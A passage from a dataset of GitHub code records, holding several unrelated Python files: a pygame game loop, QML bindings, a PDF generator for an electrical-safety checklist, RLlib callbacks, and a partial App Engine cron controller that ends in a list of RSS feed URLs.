游戏循环 -->意味着游戏的正式开始\nwhile True:\n # 设置屏幕刷新帧率\n clock.tick(60)\n\n # 监听事件\n for event in pygame.event.get():\n # 判断用户是否点击了关闭按钮\n if event.type == pygame.QUIT:\n print(\"退出游戏....\")\n # 卸载所有已经加载的pygame模块\n pygame.quit()\n # 这里不能用break,break只能跳出当前的for循环,又返回到外部的while循环中\n # break\n # 这里用exit(),可以直接终止整个程序\n exit()\n # 修改英雄位置\n hero_rect.y -= 1\n if hero_rect.bottom <= 0:\n hero_rect.y = screen.get_height()\n\n # 重新绘制所有图像\n # 如果不再次绘制背景,会产生飞机的残影效果\n # 因为这是同一个屏幕对象,screen最后产生的效果是所有图像的叠加\n # 再次绘制背景就是要把以前的图像全部遮盖住\n screen.blit(bg, (0, 0))\n # blit方法的第二个参数既可以是一个矩形,也可以是一个坐标元组\n screen.blit(hero, hero_rect)\n # screen.blit(hero, (hero_rect.x, hero_rect.y))\n # 更新屏幕\n pygame.display.update()\n","repo_name":"kenzzuli/hm_15","sub_path":"01-04_python基础/飞机大战/hm_11_监听事件列表.py","file_name":"hm_11_监听事件列表.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28904129536","text":"from __future__ import unicode_literals\nfrom functools import partial\n\nfrom PyQuick.DOtherSide import ffi, lib\nfrom PyQuick.QtCore import QUrl, QObject\nfrom PyQuick.utils import encode_first_arg, str2ptr\n\n\ndef create_callback(id, wrapper, bindedQObject, dosQObject, type_):\n obj = type_()\n bindedQObject[0] = obj._handle\n dosQObject[0] = obj._vptr\n\n\n@ffi.callback('DeleteDObject')\ndef delete_callback(id, bindedQObject):\n lib.dos_qobject_delete(bindedQObject[0])\n\n\ndef qmlRegisterType(type_, mod_name, major, minor, type_name):\n \"\"\"\n qmlRegisterType(type, str, int, int, str, attachedProperties: type = 0) -> int\n \"\"\"\n new_callback = ffi.callback('CreateDObject')(partial(create_callback, type_=type_))\n return lib.dos_qdeclarative_qmlregistertype(\n ffi.new(\n 'const QmlRegisterType *',\n {\n 'major': major,\n 'minor': minor,\n 'uri': str2ptr(mod_name),\n 'qml': str2ptr(type_name),\n 'staticMetaObject': type_.metaObject()._vptr,\n 'createDObject': new_callback,\n 'deleteDObject': delete_callback\n }\n )\n )\n\n\ndef qmlRegisterSingletonType(type_, mod_name, major, minor, type_name):\n \"\"\"\n qmlRegisterSingletonType(type, str, int, int, str) -> int\n \"\"\"\n return lib.dos_qdeclarative_qmlregistersingletontype(\n ffi.new(\n 'const QmlRegisterType *',\n {\n 'major': major,\n 'minor': minor,\n 'uri': str2ptr(mod_name),\n 'qml': str2ptr(type_name),\n 'staticMetaObject': type_.metaObject()._vptr,\n 'createDObject': create_callback,\n 'deleteDObject': delete_callback\n }\n )\n )\n\n\nclass QQmlContext(object):\n def __init__(self, vptr):\n self._vptr = vptr\n\n @encode_first_arg\n def setContextProperty(self, name, value):\n lib.dos_qqmlcontext_setcontextproperty(self._vptr, name, value._vptr)\n \n def baseUrl(self):\n return QUrl(lib.dos_qqmlcontext_baseUrl(self._vptr))\n\n \nclass QQmlApplicationEngine(object):\n def __init__(self, *args, **kwargs):\n vptr = lib.dos_qqmlapplicationengine_create()\n self._vptr = ffi.gc(vptr, lib.dos_qqmlapplicationengine_delete)\n if len(args):\n url = args[0]\n self.load(url)\n\n def load(self, url):\n if not isinstance(url, QUrl):\n # lib.dos_qqmlapplicationengine_load(self._vptr, url)\n url = QUrl(url)\n lib.dos_qqmlapplicationengine_load_url(self._vptr, url._vptr)\n\n @encode_first_arg\n def loadData(self, data):\n lib.dos_qqmlapplicationengine_load_data(self._vptr, data)\n\n @encode_first_arg\n def addImportPath(self, path):\n lib.dos_qqmlapplicationengine_add_import_path(self._vptr, path)\n\n def rootContext(self):\n return QQmlContext(lib.dos_qqmlapplicationengine_context(self._vptr))\n \n def rootObjects(self):\n raise NotImplementedError\n \n @encode_first_arg\n def addImageProvider(self, name, provider):\n lib.dos_qqmlapplicationengine_addImageProvider(self._vptr, name, provider._vptr)\n","repo_name":"SoulMelody/PyQuick","sub_path":"PyQuick/QtQml.py","file_name":"QtQml.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75242074114","text":"import Src.Classification as classify\nimport Src.DataFormatter as dfm\nimport numpy as np\n\nexpression_file = \"Data/CCLE_Data/sample1000.csv\"\nic50_file = 'Data/IC_50_Data/CL_Sensitivity_Multiple_Drugs.csv'\npatient_directory = \"Data/TCGA_Data/9f2c84a7-c887-4cb5-b6e5-d38b00d678b1/Expression-Genes/UNC__AgilentG4502A_07_3/Level_3\"\n\ndef test_neat_accuracy():\n model = classify.Scikit_Model(\"neat\")\n accuracy = model.get_model_accuracy_filter_feature_size(expression_file,ic50_file,5,1,\"SMAP\")\n acc = [a for a in accuracy]\n print(acc)\n","repo_name":"joewledger/Cell-Line-Classification","sub_path":"Tests/Test_Classification.py","file_name":"Test_Classification.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36865905456","text":"from homework_13.task_02.last_works import Rectangle\nfrom homework_13.task_02.custom_exceptions import (RectangleTypeError, RectangleValueError)\n\n\nclass RectangleWorks:\n @classmethod\n def rectangle_create(cls, length: [int, float], width: [int, float]) -> Rectangle:\n if not isinstance(length, (int, float)):\n raise RectangleValueError(value=length)\n if not isinstance(width, (int, float)):\n raise RectangleValueError(value=width)\n if width <= 0 or length <= 0:\n raise RectangleValueError\n return Rectangle(length, width)\n\n @classmethod\n def rectangle_sum(cls, left: Rectangle, right: Rectangle) -> Rectangle:\n if not isinstance(left, Rectangle):\n raise RectangleTypeError(left)\n if not isinstance(right, Rectangle):\n raise RectangleTypeError(right)\n return left + right\n\n @classmethod\n def rectangle_sub(cls, left: Rectangle, right: Rectangle) -> Rectangle:\n if not isinstance(left, Rectangle):\n raise RectangleTypeError(left)\n if not isinstance(right, Rectangle):\n raise RectangleTypeError(right)\n return left - right\n","repo_name":"BeliaevAndrey/Python-II-Homeworks","sub_path":"homework_13/task_02/homework13_classes/RectangleWorksClass.py","file_name":"RectangleWorksClass.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6100743987","text":"class MyIterator:\r\n def __iter__(self):\r\n self.n = 0\r\n return self\r\n\r\n def __next__(self):\r\n self.n += 1\r\n if self.n<=10:\r\n return self.n\r\n else:\r\n raise StopIteration\r\n\r\nit = iter(MyIterator())\r\nprint(list(it))\r\nprint(tuple(it))\r\nprint(set(it))\r\nprint(frozenset(it))\r\nprint(dict(enumerate(it)))","repo_name":"psounis/python_advanced","sub_path":"advanced/advanced02.iterators/iterator.conversions.py","file_name":"iterator.conversions.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"39653512102","text":"from fpdf import FPDF\nfrom pathlib import Path\n\ndef create_pdf(input):\n\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n\n base_path = Path(__file__).parent\n\n dguvnormalpath = (base_path / \"resources/fonts/DGUVMeta-Normal.ttf\").resolve()\n dguvboldpath = (base_path / \"resources/fonts/DGUVMeta-Bold.ttf\").resolve()\n dguvnormalitalicpath = (base_path / \"resources/fonts/DGUVMeta-NormalItalic.ttf\").resolve()\n\n pdf.add_font('DGUVMeta-Normal', '', dguvnormalpath, uni=True)\n pdf.add_font('DGUVMeta-Bold', '', dguvboldpath, uni=True)\n pdf.add_font('DGUVMeta-NormalItalic', '', dguvnormalitalicpath, uni=True)\n\n template1page1path = (base_path / \"resources/images/newtemplate1_seite1.jpg\").resolve()\n pdf.image(str(template1page1path), x=-4, y=-8, w=217, h=313)\n\n data = {}\n docid = input.get(\"docid\")\n input = input.get(\"data\")\n\n #Kopffragen\n\n data[\"arbeitsstelle\"] = input.get('#/properties/arbeitsstelle-arbeitsort')\n jsontime = input.get('#/properties/datum-und-uhrzeit')\n try:\n if 'null' in jsontime:\n datetime = '%s.%s.%s' % (jsontime[8:10], jsontime[5:7], jsontime[:4])\n else:\n datetime = '%s.%s.%s %s' % (jsontime[8:10], jsontime[5:7], jsontime[:4], jsontime[11:])\n except:\n datetime = jsontime\n data[\"datum_uhrzeit\"] = datetime\n data[\"person_anlageverantwortlichkeit\"] = input.get('#/properties/person-in-der-rolle-des-anlagenverantwortlichen')\n data[\"person_arbeitsverantwortlichkeit\"] = input.get('#/properties/person-in-der-rolle-des-arbeitsverantwortlichen')\n data[\"person_arbeitsausfuehrung\"] = input.get('#/properties/arbeitsausfuhrende-person')\n\n data[\"zusaetzliche_schutzausrüstung_elektrischerschlag\"] = \"\"\n data[\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"] = \"\"\n if input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n if 'gegen elektrischen Schlag' in input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n data[\"zusaetzliche_schutzausrüstung_elektrischerschlag\"] = \"x\"\n\n if 'gegen Störlichtbogen' in input.get('#/properties/zusatzliche-personliche-schutzausrustung-bei-der-1'):\n data[\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"] = \"x\"\n\n if input.get('#/properties/stehen-andere-anlagenteile-weiterhin-unter') == \"ja\":\n data[\"abgrenzung_arbeitsbereich_ja\"] = \"x\"\n else:\n data[\"abgrenzung_arbeitsbereich_ja\"] = \"\"\n\n if input.get('#/properties/stehen-andere-anlagenteile-weiterhin-unter') == \"nein\":\n data[\"abgrenzung_arbeitsbereich_nein\"] = \"x\"\n else:\n data[\"abgrenzung_arbeitsbereich_nein\"] = \"\"\n\n # 1\n\n data[\"art_der_freischaltung\"] = input.get('#/properties/edi4961450e44ba4d16aeb015a919e73f0a')\n\n if data[\"art_der_freischaltung\"] == \"NH-Sicherungen\":\n data[\"ausloesestrom\"] = input.get('#/properties/edibe2aabe1258d47b585d178a186601fc3')\n elif data[\"art_der_freischaltung\"] == \"NH-Lastschaltleiste\":\n data[\"ausloesestrom\"] = input.get('#/properties/edib93efcc9a763409c9d3e8357a8774554')\n elif data[\"art_der_freischaltung\"] == \"Schraubsicherungen\":\n data[\"ausloesestrom\"] = input.get('#/properties/edic980387b0bd741e2ac4a15e7e4b6cc2e')\n else:\n data[\"ausloesestrom\"] = \"\"\n\n data[\"ort_der_freischaltung\"] = input.get('#/properties/edi2e32c9143f91464392d3ea5b72c1db89')\n\n if data[\"ort_der_freischaltung\"] == \"Hauptverteilung\":\n data[\"ort_nroderbezeichnung\"] = input.get('#/properties/edi32c21570304b4f0d911d02b8a8046d0c')\n elif data[\"ort_der_freischaltung\"] == \"Unterverteilung\":\n data[\"ort_nroderbezeichnung\"] = input.get('#/properties/edi6ba4422c3dad4ea2a5ed921a02764123')\n else:\n data[\"ort_nroderbezeichnung\"] = \"\"\n\n # 2\n\n data[\"sperrelement\"] = input.get('#/properties/edi36e713d0f0544afab38414b8d139fcec')\n data[\"betriebsraum_tuer_verschlossen\"] = input.get('#/properties/edi8aeb082703364653b77ecedfb294800c')\n data[\"schalten_verboten\"] = input.get('#/properties/ediff3de7cc99c74d7a8d7fc9430714cc4d')\n data[\"entzogene_nhsicherungen\"] = input.get('#/properties/edi50f4e39a4ebd44a083133f828058814a')\n\n # 3\n\n data[\"spannungspruefer\"] = input.get('#/properties/edi9b0ea2910d514df791e528597a6e5f28')\n data[\"usv\"] = input.get('#/properties/edi94283112763649bda0ef6f900ddc2cbc')\n\n # 4\n\n data[\"euk_wo_eingebaut\"] = input.get('#/properties/edibba761f4767d4a3b9f1528712f8f1abe')\n if data[\"euk_wo_eingebaut\"] == \"Nicht geerdet und kurzgeschlossen\":\n data[\"geerdet_begruendung\"] = input.get('#/properties/edi1941312f7bf04fa5996ec5eb018f4c78')\n else:\n data[\"geerdet_begruendung\"] = \"\"\n\n # 5\n\n data[\"ziel_der_abdeckung\"] = input.get('#/properties/edi94f9841893d04f6184e06a9b57797e59')\n\n if data[\"ziel_der_abdeckung\"] == \"ausreichender Berührungsschutz\":\n data[\"art_der_abdeckung\"] = ', '.join(input.get('#/properties/edib6c44b7e15b043ec9dff1538ffc40229'))\n elif data[\"ziel_der_abdeckung\"] == \"vollständiger Berührungsschutz\":\n data[\"art_der_abdeckung\"] = ', '.join(input.get('#/properties/edifc9c22900aa44e15b334d724a0c3eed6'))\n elif data[\"ziel_der_abdeckung\"] == \"Abdeckung nicht notwendig\":\n entfernung_text = input.get('#/properties/edi66bace84743b4078b2aa9941828b96d6')\n entfernung_meter = input.get('#/properties/edicd089579321d4eac9ab5a08f7f2f5f07')\n data[\"art_der_abdeckung\"] = \"%s %s m\" % (entfernung_text, entfernung_meter)\n else:\n data[\"art_der_abdeckung\"] = \"\"\n\n # Title\n\n pdf.set_font('DGUVMeta-Bold', '', 20)\n pdf.set_text_color(0,73,148)\n pdf.set_xy(12.7, 58.5)\n pdf.cell(0, 0, 'Arbeiten an Unterverteilungen')\n\n pdf.set_font('DGUVMeta-Bold', '', 20)\n pdf.set_text_color(0,73,148)\n pdf.set_xy(12.7, 68)\n pdf.cell(0, 0, 'in der Niederspannung')\n\n pdf.set_font('DGUVMeta-Bold', '', 14)\n pdf.set_text_color(0,140,142)\n pdf.set_xy(12.7, 83.5)\n pdf.cell(0, 0, 'Elektrohandwerk')\n\n # Kopffragen\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 107)\n pdf.set_text_color(0,0,0)\n pdf.cell(0, 0, data.get(\"arbeitsstelle\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 126)\n pdf.cell(0, 0, data.get(\"datum_uhrzeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 145)\n pdf.cell(0, 0, data.get(\"person_anlageverantwortlichkeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 164)\n pdf.cell(0, 0, data.get(\"person_arbeitsverantwortlichkeit\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(13, 183)\n pdf.cell(0, 0, data.get(\"person_arbeitsausfuehrung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(20, 208.5)\n pdf.cell(0, 0, \"gegen elektrischen Schlag\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(14.3, 208.3)\n pdf.cell(0, 0, data.get(\"zusaetzliche_schutzausrüstung_elektrischerschlag\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(78, 208.5)\n pdf.cell(0, 0, \"gegen Störlichbogen\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(72.2, 208.3)\n pdf.cell(0, 0, data.get(\"zusaetzliche_schutzausrüstung_stoerlichtbogen\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(20, 232)\n pdf.cell(0, 0, \"ja\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(14.4, 231.6)\n pdf.cell(0, 0, data.get(\"abgrenzung_arbeitsbereich_ja\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_xy(78, 232)\n pdf.cell(0, 0, \"nein\")\n\n pdf.set_font('DGUVMeta-Normal', '', 14)\n pdf.set_xy(72.2, 231.6)\n pdf.cell(0, 0, data.get(\"abgrenzung_arbeitsbereich_nein\"))\n\n #Adding new page\n\n pdf.add_page()\n template1page2path = (base_path / \"resources/images/newtemplate1_seite2.jpg\").resolve()\n pdf.image(str(template1page2path), x=-4, y=-8, w=217, h=313)\n\n # 1 Freigeschaltet\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 29.2)\n pdf.cell(0, 0, 'Wie erfolgte die Freischaltung?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 34.2)\n pdf.cell(0, 0, data.get(\"art_der_freischaltung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 39.2)\n pdf.cell(0, 0, 'Auslösestrom: %s A' % data.get(\"ausloesestrom\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 50)\n pdf.cell(0, 0, 'Wo erfolgte die Freischaltung?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 55)\n pdf.cell(0, 0, data.get(\"ort_der_freischaltung\"))\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 60)\n pdf.cell(0, 0, 'Nr. oder Bezeichnung: %s' % data.get(\"ort_nroderbezeichnung\"))\n\n # 2 Gegen Wiedereinschalten gesichert\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 77.5)\n pdf.cell(0, 0, 'Wurde ein Sperrelement eingesetzt, weil der Bereich für Laien zugänglich ist?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 82.5)\n pdf.cell(0, 0, data.get(\"sperrelement\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 89)\n pdf.cell(0, 0, 'Wurde die Tür zum elektrischen Betriebsraum verschlossen?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 94)\n pdf.cell(0, 0, data.get(\"betriebsraum_tuer_verschlossen\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 100.5)\n pdf.cell(0, 0, 'Wurde ein Schild \"Schalten verboten\" zusätzlich angebracht?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 105.5)\n pdf.cell(0, 0, data.get(\"schalten_verboten\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 112)\n pdf.cell(0, 0, 'Wurden ausgebaute NH-Sicherungen unbefugtem Zugriff entzogen, z. B. mitgenommen?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 117)\n pdf.cell(0, 0, data.get(\"entzogene_nhsicherungen\"))\n\n # 3 Spannungsfreiheit allpolig festgestellt an der Arbeitsstelle\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 136)\n pdf.cell(0, 0, 'Zweipoliger Spannungsprüfer:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 141)\n pdf.cell(0, 0, data.get(\"spannungspruefer\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 147.5)\n pdf.cell(0, 0, 'Dezentrale Einspeisung vorhanden, z. B. USV, PV, Notstromaggregat?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 152.5)\n pdf.cell(0, 0, data.get(\"usv\"))\n\n # 4 Geerdet und kurzgeschlossen\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 189)\n pdf.cell(0, 0, 'Wo wurde die EuK-Vorrichtung eingebaut?')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 194)\n pdf.cell(0, 0, data.get(\"euk_wo_eingebaut\"))\n\n if data[\"euk_wo_eingebaut\"] == \"Nicht geerdet und kurzgeschlossen\":\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 200.5)\n pdf.cell(0, 0, 'Begründung:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 205.5)\n pdf.cell(0, 0, data.get(\"geerdet_begruendung\"))\n\n # 5 Mit der Abdeckung soll erreicht werden\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 236.6)\n pdf.cell(0, 0, 'Mit der Abdeckung soll erreicht werden:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 241.6)\n pdf.cell(0, 0, data.get(\"ziel_der_abdeckung\"))\n\n pdf.set_font('DGUVMeta-Bold', '', 10)\n pdf.set_text_color(35,31,32)\n pdf.set_xy(12.7, 248.1)\n if data[\"ziel_der_abdeckung\"] != \"Abdeckung nicht notwendig\":\n pdf.cell(0, 0, 'Art der Abdeckung:')\n else:\n pdf.cell(0, 0, 'keine Abdeckung angebracht, weil:')\n\n pdf.set_font('DGUVMeta-Normal', '', 10)\n pdf.set_text_color(0,0,0)\n pdf.set_xy(12.7, 253.1)\n pdf.cell(0, 0, data.get(\"art_der_abdeckung\"))\n\n return pdf.output('/tmp/%s.pdf' % docid, 'F')\n\nif __name__ == \"__main__\":\n from importdata import unterverteilung as input\n create_pdf(input)\n","repo_name":"educorvi/ella.printfiverules","sub_path":"src/printfiverules/s144.py","file_name":"s144.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29418761505","text":"from typing import Dict, Optional, TypeVar\n\nimport numpy as np\nfrom opentelemetry import trace\nfrom opentelemetry.exporter.jaeger.thrift import JaegerExporter\nfrom opentelemetry.sdk.resources import SERVICE_NAME, Resource\nfrom opentelemetry.sdk.trace import Span, TracerProvider\nfrom opentelemetry.sdk.trace.export import BatchSpanProcessor\nfrom ray.rllib import SampleBatch\nfrom ray.rllib.algorithms.callbacks import DefaultCallbacks\nfrom ray.rllib.env import BaseEnv\nfrom ray.rllib.evaluation import MultiAgentEpisode, RolloutWorker\nfrom ray.rllib.policy import Policy\nfrom ray.rllib.utils.typing import PolicyID\n\nfrom ray_runner.bigtwo_multi_agent import BigTwoMultiAgentEnv\n\n\ndef setup_tracing() -> None:\n resource = Resource(attributes={SERVICE_NAME: \"rayrunner\"})\n\n jaeger_exporter = JaegerExporter(\n agent_host_name=\"localhost\",\n agent_port=6831,\n udp_split_oversized_batches=True,\n )\n\n processor = BatchSpanProcessor(jaeger_exporter)\n provider = TracerProvider(resource=resource)\n\n provider.add_span_processor(processor)\n trace.set_tracer_provider(provider)\n\n\nclass CustomMetricCallback(DefaultCallbacks):\n def on_episode_end(\n self,\n *,\n worker: RolloutWorker,\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n hands_played, actions_attempted = [], []\n card_length_played = {}\n for unwrapped_env in base_env.get_unwrapped():\n if not isinstance(unwrapped_env, BigTwoMultiAgentEnv):\n continue\n\n hands_played.append(unwrapped_env.hands_played())\n actions_attempted.append(unwrapped_env.actions_attempted())\n\n for player_idx, action in unwrapped_env.base_env.past_actions:\n card_length_played[len(action)] = (\n card_length_played.get(len(action), 0) + 1\n )\n\n episode.custom_metrics[\"hands_played\"] = np.mean(hands_played)\n episode.custom_metrics[\"actions_attempted\"] = np.mean(actions_attempted)\n\n for hand_length, counter in card_length_played.items():\n episode.custom_metrics[f\"hand_length_{hand_length}\"] = counter\n\n\nclass TracingCallback(DefaultCallbacks):\n def __init__(self):\n super().__init__()\n self.episode_start_span: Optional[Span] = None\n\n def on_episode_start(\n self,\n *,\n worker: \"RolloutWorker\",\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n tracer = trace.get_tracer(__name__)\n self.episode_start_span = tracer.start_span(\"on_episode_start\")\n\n def on_episode_end(\n self,\n *,\n worker: \"RolloutWorker\",\n base_env: BaseEnv,\n policies: Dict[PolicyID, Policy],\n episode: MultiAgentEpisode,\n env_index: Optional[int] = None,\n **kwargs,\n ) -> None:\n if self.episode_start_span:\n self.episode_start_span.end()\n\n def on_sample_end(\n self, *, worker: \"RolloutWorker\", samples: SampleBatch, **kwargs\n ) -> None:\n if self.episode_start_span and self.episode_start_span.end_time is None:\n self.episode_start_span.end()\n\n def on_learn_on_batch(\n self, *, policy: Policy, train_batch: SampleBatch, result: dict, **kwargs\n ) -> None:\n # print(\"learn_on_batch:\", train_batch.count, datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"))\n pass\n","repo_name":"Wal8800/card-games","sub_path":"ray_runner/ray_custom_util.py","file_name":"ray_custom_util.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5627686029","text":"# coding=UTF-8\n# -*- coding: UTF-8 -*-\nimport datetime\nimport logging\nimport math\nimport urllib2\n\nfrom google.appengine.api import taskqueue, mail\n\nfrom common.lib.CategoryLib import CategoryLib\nfrom common.lib.Controller import Controller\nfrom common.lib.MturkLib import MturkLib\nfrom common.lib.RSSLib import RSSLib\nfrom common.models.CategoryModel import CategoryModel\nfrom module.article.lib.ArticleLib import ArticleLib\nfrom module.article.model.ArticleModel import ArticleModel\nfrom module.associatedpress.lib.AssociatedPressLib import AssociatedPressLib\nfrom module.category.CategoryController import CategoryController\nfrom module.comments.lib.CommentsLib import CommentsLib\nfrom module.comments.model.Comments import Comments\nfrom module.home.view.NullView import NullView\nfrom module.mturk.MturkController import MturkController\nfrom module.natlang.model.SentenceModel import SentenceModel\nfrom module.usatoday.lib.UsaTodayLib import UsaTodayLib\nfrom module.wiki.lib.WikiLib import WikiLib\nfrom module.wiki.model.WikiCategoryModel import WikiCategoryModel\nfrom module.wiki.model.WikiModel import WikiModel\nfrom webapp2_extras.appengine.auth.models import User\n\nclass CronController(Controller):\n \n def generate_reportAction(self):\n model={'num_comments':0,'num_articles':0,'num_users':0}\n # number of new comments in the last 24 hours\n model['num_comments']=Comments.all().filter(\"created >\",(datetime.datetime.now()-datetime.timedelta(days=1))).count()\n # number of new articles in the last 24 hours\n model['num_articles']=ArticleModel.all().filter(\"updated >\",(datetime.datetime.now()-datetime.timedelta(days=1))).count()\n # number of new users in the last 24 hours\n \n qry = User.query(User.created > datetime.datetime.now()-datetime.timedelta(days=1))\n model['num_users']=qry.count()\n \n mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', 'Daily Activity Report',str(model)) \n \n return model\n \n \n def set_category_levelAction(self):\n model={\"total\":0}\n \n category=CategoryModel.all().filter(\"level =\",None).filter(\"wikiname !=\",None).get()\n \n if category:\n CategoryController().set_category_levelAction(category.wikiname)\n \n return model\n \n def sort_articlesAction(self):\n model={\"num_articles\":0}\n model['num_articles']=ArticleLib.sort_articles()\n return model\n \n def reload_article_memcacheAction(self):\n model={\"num_articles\":0}\n model['num_articles']=ArticleLib.reload_memcache()\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', '/cron/reload_article_memcache','loaded '+str(model['num_articles'])+\" articles\")\n return model\n \n def flush_article_memcache_to_dbAction(self):\n model={\"total\":0}\n model['total']=ArticleLib.flush_memcache_to_db()\n #mail.send_mail('lexiconcept@gmail.com', 'admin@syytacit.net', '/cron/flush_article_memcache_to_db','flushed '+str(model['total'])+\" records\") \n return model\n \n def delete_category_search_indexAction(self,page=1,limit=100,rebuild=True):\n model={\"total\":0}\n \n model['total']=CategoryLib.deleteSearchIndex(limit)\n if model['total']>0:\n taskqueue.add(url=\"/json/cron/delete_category_search_index\")\n elif rebuild:\n taskqueue.add(url=\"/json/cron/build_category_search_index\")\n return model\n \n def build_category_search_indexAction(self,page=1,limit=100):\n model={\"total\":0}\n \n model['total']=CategoryLib.buildSearchIndex(page,limit)\n if model['total']>0:\n taskqueue.add(url=\"/json/cron/build_category_search_index\")\n \n return model\n def acquire_rss_articlesAction(self,rss_url=None):\n model={'num_articles':0,\"num_queued\":0}\n if rss_url:\n rss_url=urllib2.unquote(rss_url)\n model['num_articles']=model['num_articles']+RSSLib.saveArticles(rss_url)\n logging.info(\"loaded \"+str(model['num_articles'])+\" new articles\")\n else:\n \n rssfeeds=[\n 'http://news.stanford.edu/rss/grad.xml',\n 'http://www.fda.gov/AboutFDA/ContactFDA/StayInformed/RSSFeeds/PressReleases/rss.xml',\n 'http://www.nist.gov/rss/math.xml',\n 'http://www.fda.gov/downloads/Drugs/ResourcesForYou/HealthProfessionals/UCM220293.xml',\n 'http://www.bea.gov/rss/rss.xml',\n 'http://news.stanford.edu/rss/humanities.xml',\n 'http://www.army.mil/rss/73/',\n 'http://www.loc.gov/rss/pao/news.xml',\n 'http://www.nist.gov/rss/nanotechnology.xml',\n #'http://feeds.feedblitz.com/cbospublications&x=1',\n 'http://media.ca7.uscourts.gov/oralArguments/oar.jsp?rss=rss',\n 